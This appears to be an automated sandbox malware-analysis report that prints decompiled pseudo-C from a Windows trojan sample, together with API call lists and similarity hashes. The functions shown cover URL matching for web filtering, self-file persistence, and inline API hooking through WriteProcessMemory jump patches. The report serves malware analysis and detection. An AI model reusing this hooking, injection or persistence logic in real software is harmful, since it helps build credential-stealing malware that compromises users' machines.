Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
Instruction ID: a322bd2c658f0833cb6b0f0a38ff9ffaa20a9a7f680455052717c4b83f970561
Opcode Fuzzy Hash: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
Instruction Fuzzy Hash: F7412371D0520AAFCB108FA8C9855FFBBB4FB04350F5045BAE511B22A0D778AD41DBE6

Uniqueness

Uniqueness Score: -1.00%

Function 004150CD, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004150CD(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x423e54);
				_t225 =  *0x423e70;
				if( *0x423e70 == 0 ||  *0x423e6c == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E00414802(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E00409D57();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E004148BC(0, 4,  &_v20,  *0x423e6c);
							_push(_v20);
							if(_t214 == 0) {
								E0040C1C2();
							}
							E00409DC2(_t225);
						}
						E0040C1C2( *0x423e6c);
						E0040C1C2( *0x423e70);
						 *0x423e6c = _t217;
						 *0x423e70 = _t217;
					}
				}
				LeaveCriticalSection(0x423e54);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E00414ABD(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E004128A5(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E0040C233( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E004128DB(_t167,  &_v168);
						_t172 = E0040CF30( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E004128DB(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E0040CF30( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E0040D571(_v24, _t172 + _t172);
								if( *0x423e74 != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x423e74 = _t174;
								} else {
									E0040C1C2(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E0040C1C2(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E00414B25(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E00414EDF(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E004128A5(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E0040C620(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E00409F6A( &_v32);
											_t144 = E0040C402( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E0040C275( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E004128DB(_t152,  &_v272);
													_t154 = 0xd;
													E004128DB(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x4019b0;
													_t230 =  ==  ? 0x4019b0 : _v24;
													_t244 =  ==  ? 0x4019b0 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E00409404(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E0040C1C2(_t235);
											}
											E0040C1C2(_v32);
											E0040C1C2(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E0040C620(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E004128A5(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E00411D2E( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E0040D054(_t189, _v32) == 0) {
					L37:
					E0040C1C2(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E00414802(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E0040C275( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E00409F24( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E0040D092(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x004150de
0x004150e1
0x004150e4
0x004150e8
0x004150ee
0x004150f6
0x00415167
0x00415100
0x00415100
0x00415106
0x00415112
0x00415114
0x00415119
0x0041511e
0x0041512c
0x00415131
0x00415136
0x00415138
0x0041513d
0x0041513e
0x0041513e
0x00415149
0x00415154
0x00415159
0x0041515f
0x0041515f
0x00415112
0x0041516b
0x00415171
0x00415174
0x00415176
0x0041527b
0x0041527f
0x00415281
0x00415284
0x00415286
0x0041529b
0x0041529b
0x00415286
0x004152a3
0x004152aa
0x004152ab
0x004152b0
0x004152c1
0x004152c3
0x004152c8
0x004152ce
0x004152ce
0x004152c8
0x004152c1
0x004152d2
0x004152d5
0x004152da
0x00415315
0x00415315
0x00415318
0x0041531a
0x00000000
0x00000000
0x0041531c
0x0041531f
0x00000000
0x00000000
0x00415329
0x0041532a
0x0041533c
0x00415341
0x00000000
0x004152e1
0x004152e1
0x004152e6
0x00000000
0x004152ed
0x004152f5
0x004152f6
0x004152fe
0x0041530b
0x00415310
0x00415344
0x00415346
0x0041534e
0x00415359
0x00415368
0x00415368
0x00415368
0x0041536c
0x0041535b
0x0041535e
0x00415363
0x00415363
0x00415359
0x00415371
0x00415374
0x00415378
0x0041538d
0x00415391
0x00415397
0x0041539b
0x0041550e
0x00415511
0x00415516
0x0041551c
0x00415526
0x00415528
0x00415528
0x0041552e
0x0041553b
0x0041553b
0x0041552e
0x00415544
0x00415544
0x004153a1
0x004153a4
0x004153a8
0x004153bc
0x004153c0
0x004153fd
0x00415401
0x0041550a
0x0041550a
0x00000000
0x0041550a
0x00415409
0x0041540c
0x0041540d
0x00415414
0x00415415
0x00415417
0x00415417
0x0041541d
0x00415420
0x00415424
0x00000000
0x00000000
0x0041542d
0x0041543a
0x0041543f
0x00415443
0x0041544b
0x00415456
0x00415467
0x00415479
0x00415483
0x00415484
0x0041548e
0x0041548f
0x0041549d
0x004154a2
0x004154a7
0x004154ac
0x004154b1
0x004154b3
0x004154b3
0x004154bc
0x004154be
0x004154be
0x004154c1
0x004154c4
0x004154c5
0x004154c6
0x004154c7
0x004154e3
0x004154e8
0x004154ee
0x004154ee
0x004154f1
0x004154f1
0x004154f9
0x00415501
0x00415508
0x00000000
0x00000000
0x00000000
0x00000000
0x00415508
0x004153ca
0x004153cc
0x004153cf
0x004153d1
0x00000000
0x00000000
0x004153d7
0x004153d9
0x004153dc
0x00000000
0x00000000
0x00000000
0x00000000
0x004153de
0x004153de
0x004153de
0x004153e1
0x004153e4
0x004153ec
0x004153ef
0x004153f1
0x004153f1
0x004153e6
0x004153e6
0x004153e6
0x004153f5
0x004153f6
0x004153f6
0x00000000
0x004153fb
0x004153ac
0x004153af
0x004153b0
0x004153b7
0x004153b8
0x00000000
0x004153b8
0x00415393
0x00415393
0x00000000
0x00415393
0x0041537e
0x00415389
0x00000000
0x00000000
0x0041538b
0x00000000
0x0041537e
0x004152e6
0x004152da
0x0041518a
0x0041518f
0x00415192
0x0041519c
0x00415271
0x00415274
0x00415279
0x00000000
0x004151a2
0x004151a2
0x004151a5
0x004151a5
0x004151ab
0x00000000
0x00000000
0x004151b1
0x004151b5
0x004151d5
0x004151d5
0x004151d7
0x004151da
0x004151df
0x004151e8
0x00000000
0x00000000
0x004151ed
0x004151f0
0x00415255
0x00415259
0x0041525c
0x00000000
0x00000000
0x00000000
0x0041525c
0x004151f2
0x004151f3
0x00415202
0x00415202
0x00000000
0x00415202
0x004151f5
0x004151f6
0x0041520a
0x00415212
0x0041521d
0x00415229
0x0041522f
0x00415236
0x0041523c
0x0041523f
0x00415241
0x00415245
0x0041524e
0x0041524e
0x00415245
0x00000000
0x0041523f
0x004151f8
0x004151f9
0x004151fe
0x00000000
0x00000000
0x00000000
0x00000000
0x004151f9
0x004151b9
0x00000000
0x004151cf
0x004151bd
0x00000000
0x004151cb
0x004151c1
0x004151c7
0x00000000
0x004151c3
0x004151c3
0x00000000
0x004151c3
0x0041525e
0x00415267
0x00415269
0x00000000
0x004151a5

APIs

EnterCriticalSection.KERNEL32(00423E54,-004223DC,00000000,004223C0), ref: 004150E8
LeaveCriticalSection.KERNEL32(00423E54), ref: 0041516B
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00415236
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00415470

Part of subcall function 00409D57: CreateMutexW.KERNEL32(004238D8,00000000,00422918,00423E54,?,?,00415119,00000000,00000000), ref: 00409D7F

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Strings

T>B, xrefs: 004150D9
, xrefs: 00415385

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID: $T>B
API String ID: 4018265435-2584829405
Opcode ID: 0b603687b0ced278c429ddb86ea6dedb9f57962babd8018416775380410b76f3
Instruction ID: 7916633256d4ec4063803f8b8ec0302a62f5915c5345939eecd1e5fa739cc736
Opcode Fuzzy Hash: 0b603687b0ced278c429ddb86ea6dedb9f57962babd8018416775380410b76f3
Instruction Fuzzy Hash: 52D1DF31E00A09EEDF219BA1C845BEF7BB6AF81304F14456BE851A7291C7B89DC5CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00408D5C, Relevance: 10.7, APIs: 7, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00408D5C(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				char _v793;
				signed short _v856;
				signed short _v1048;
				char _v1052;
				short _v1572;
				short _v1576;
				intOrPtr _v1580;
				signed char* _v1584;
				signed int _v1588;
				char* _v1592;
				void* _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				signed int _v1616;
				signed int _v1620;
				void* _v1621;
				signed int _v1624;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0041317B(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1620 = _t60;
				if(_t60 != 0) {
					_v1596 =  *0x423d64;
					_v1592 =  &_v268;
					_v1604 = E00408BB8;
					_v1600 = E00408CF4;
					_v1584 = _t131;
					E0041341A( &_v1052);
					E0040C1FE( &_v268,  &_v793, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v1048 >> 0x10;
						__eflags = _t71;
						_v1620 = _t71;
						_t72 = _v1048 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1620 = _v856 >> 0x10;
							_t72 = _v856 & 0x0000ffff;
							L7:
							_v1616 = _t72;
						}
					}
					_v1620 = _v1620 * 0xea60;
					_v1616 = _v1616 * 0xea60;
					E0040C275( &_v1052,  &_v1052, 0, 0x310);
					_v1584 = 0;
					_t80 = E004132A1();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1621 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E00407996();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
									_v1620 = E00411D2E(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E0040C1C2(_t138);
									__eflags = _v1624;
									if(_v1624 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1588 = _v1588 & 0;
										_t108 = E0040897C(_t128, _t129,  &_v1588, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1621;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E00409179( &_v1608);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E0041215B( &(_t131[8]));
											E0040C1C2(_v1588);
										}
									}
									E0040C1C2(_v1608);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1620;
										}
									} else {
										_t84 = _v1616;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E0040883B( !( ~(_v1572 & 0x0000ffff)) &  &_v1572, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1576);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x422468);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x422468;
										goto L14;
									}
								} else {
									_t128 =  &_v1572;
									L14:
									_t129 = _t123;
									E0040C563(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E0041151D(_t123);
										goto L29;
									} else {
										_v1584 = E004114F6(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1584 - 0xffffffff;
										if(_v1584 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													__eflags = lstrcmpiW(_t123,  &_v1572);
													if(__eflags == 0) {
														goto L24;
													} else {
														_t141 = E0041317B(_t128, __eflags, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1572, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E0040F995(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1576;
																_t129 = _t123;
																E0040C563(_t101 | 0xffffffff,  &_v1576, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1580 - 0xffffffff;
													if(_v1580 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x423d64, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E0040F995(_v1612);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E0040C1C2(_t131);
				return _t136;
			}

0x00408d5c
0x00408d6b
0x00408d7f
0x00408d84
0x00408d8a
0x00408da5
0x00408db0
0x00408dbb
0x00408dc3
0x00408dcb
0x00408dcf
0x00408de9
0x00408df1
0x00408df1
0x00408df3
0x00408e17
0x00408e17
0x00408e1a
0x00408e1e
0x00000000
0x00408df5
0x00408df5
0x00408df6
0x00408e02
0x00408e06
0x00408e26
0x00408e26
0x00408e26
0x00408df6
0x00408e34
0x00408e47
0x00408e54
0x00408e5b
0x00408e60
0x00408e65
0x00408e67
0x00408e6d
0x00408e6d
0x00408e70
0x00408e75
0x00408f75
0x00408f75
0x00408f7a
0x00408f7c
0x00408f7e
0x00000000
0x00408f80
0x00408f93
0x00408f97
0x00408f9c
0x00408fa0
0x00409018
0x00000000
0x00408fa2
0x00408fa2
0x00408fad
0x00408fb2
0x00408fb5
0x00408fb7
0x0040901b
0x0040901b
0x00408fb9
0x00408fbc
0x00408fc3
0x00408fc8
0x00408fcf
0x00408fd2
0x00408fdb
0x00408fdb
0x00408fb7
0x00409023
0x00409028
0x0040902b
0x00409033
0x00409035
0x00000000
0x00409037
0x00409037
0x00409037
0x0040902d
0x0040902d
0x0040902d
0x0040902b
0x00408e7b
0x00408e82
0x00408e8e
0x00408e9e
0x00408ea4
0x00408ea6
0x00408ea9
0x00408eb7
0x00408eb9
0x00408ebc
0x00000000
0x00408ec2
0x00408ec2
0x00000000
0x00408ec2
0x00408eab
0x00408eab
0x00408ec4
0x00408ec7
0x00408ec9
0x00408ee3
0x00408ee5
0x00408ee8
0x00408fe2
0x00408fe3
0x00000000
0x00408eee
0x00408ef5
0x00408ef9
0x00408efb
0x00408f01
0x00408f06
0x00408f10
0x00408f10
0x00408f12
0x00000000
0x00408f18
0x00408f18
0x00408f25
0x00408f31
0x00408f33
0x00000000
0x00408f35
0x00408f41
0x00408f43
0x00408f45
0x00408fe8
0x00408fe8
0x00408feb
0x00408f4b
0x00408f53
0x00408f59
0x00408f5b
0x00000000
0x00408f61
0x00408f62
0x00408f67
0x00408f6a
0x00408f6e
0x00408f70
0x00000000
0x00408f70
0x00408f5b
0x00408f45
0x00408f1a
0x00408f1a
0x00408f1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f1f
0x00408f18
0x00408f08
0x00408f08
0x00408f0a
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f0a
0x00408f06
0x00408ee8
0x00408ea9
0x00408ff7
0x00408ffd
0x00408ffd
0x00408e6d
0x0040900c
0x00409011
0x00408d8c
0x00408d8e
0x00408d8e
0x00408d90
0x00408d9d

APIs

Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000310,?,?,00000102), ref: 00408EA4
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00408EDD
CloseHandle.KERNEL32(00000000,00000000), ref: 00408EFB
lstrcmpiW.KERNEL32(?,?), ref: 00408F2B

Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID:
API String ID: 503543330-0
Opcode ID: 123243a5903a440c18414cbfd2b022419503c27b3576a7719beab0a6e08d846a
Instruction ID: 0dacff0a541982b94828aaa51f1b351be360e2f01db44290586e4793eaa5d24b
Opcode Fuzzy Hash: 123243a5903a440c18414cbfd2b022419503c27b3576a7719beab0a6e08d846a
Instruction Fuzzy Hash: 9271E031508341ABD720EF34C981A6BB7E9AF85354F140A3EF5D4B62D2DB38D9058B8A

Uniqueness

Uniqueness Score: -1.00%

Function 004109FE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004109FE(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, void* _a8) {
				char _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E004109B9(_a4) < 0x1e) {
					L18:
					return _v12;
				}
				_t3 =  &_v8; // 0x412d29
				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
					goto L18;
				}
				E0040C275( &_v48,  &_v48, 0xffffff90, 0x23);
				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
					L17:
					_t30 =  &_v8; // 0x412d29
					_t31 =  &_v8; // 0x412d29
					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t31, _t30);
					goto L18;
				} else {
					_t66 =  &_v48;
					_push(0);
					_push(_t66);
					while(1) {
						_t47 = E0041D900(_t58, _t61, _t63, _t66, _t69);
						if(_t47 == 0xffffffff) {
							break;
						}
						_t69 = _t69 + _t47;
						if(_t69 > 0x1e) {
							L16:
							goto L17;
						}
						_t61 =  *_t66;
						if(_t61 == 0xe9 || _t61 == 0xe8) {
							if(_t47 == 5) {
								 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 - _a8;
							}
						}
						_push(0);
						if(_t69 >= 5) {
							_t17 = _t69 + 5; // 0x5
							_t68 = _t17;
							 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 - _a8 - 5;
							 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
							if(WriteProcessMemory(0xffffffff, _a8,  &_v48, _t68, ??) != 0) {
								_t62 = _a4;
								_v48 = 0xe9;
								_v47 = _t58 - _t62 - 5;
								E0041D345(_t62, _a8);
								if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
									_v12 = _t68;
								}
							}
							goto L16;
						}
						_t66 = _t71 + _t69 - 0x2c;
						_push(_t66);
					}
					goto L16;
				}
			}

0x004109fe
0x004109fe
0x00410a06
0x00410a0b
0x00410a0d
0x00410a18
0x00410b12
0x00410b18
0x00410b18
0x00410a1e
0x00410a33
0x00000000
0x00000000
0x00410a41
0x00410a5a
0x00410afe
0x00410afe
0x00410b02
0x00410b0c
0x00000000
0x00410a60
0x00410a61
0x00410a64
0x00410a67
0x00410a9b
0x00410a9b
0x00410aa3
0x00000000
0x00000000
0x00410a6a
0x00410a6f
0x00410afd
0x00000000
0x00410afd
0x00410a75
0x00410a7a
0x00410a84
0x00410a8c
0x00410a8c
0x00410a84
0x00410a8f
0x00410a94
0x00410aad
0x00410aad
0x00410ab3
0x00410abf
0x00410ad0
0x00410ad2
0x00410add
0x00410ae1
0x00410ae4
0x00410af8
0x00410afa
0x00410afa
0x00410af8
0x00000000
0x00410ad0
0x00410a96
0x00410a9a
0x00410a9a
0x00000000
0x00410aa5

APIs

Part of subcall function 004109B9: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0041D2E5,00000000,00000000,00000034,0041D670,00422008,00000000), ref: 004109CE

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,)-A,-00000008,00000034,?,?,0041D406,?,00000000,?,?,0041D670,00422008), ref: 00410A2B
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0041D406,?,00000000,?,?,0041D670), ref: 00410A52
WriteProcessMemory.KERNEL32(000000FF,00422008,?,00000005,00000000,?,00000000,00000000), ref: 00410ACC
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000), ref: 00410AF4
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,)-A,)-A,?,?,0041D406,?,00000000,?,?,0041D670,00422008,00000000,00412D29), ref: 00410B0C

Strings

)-A, xrefs: 00410A1E, 00410AFE, 00410B02, 00410A21, 00410B01

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: )-A
API String ID: 390532180-3912011668
Opcode ID: 380f36af9b4bfb47285306e4499a1026238ca51f7e9324b1cbe9584085735a7d
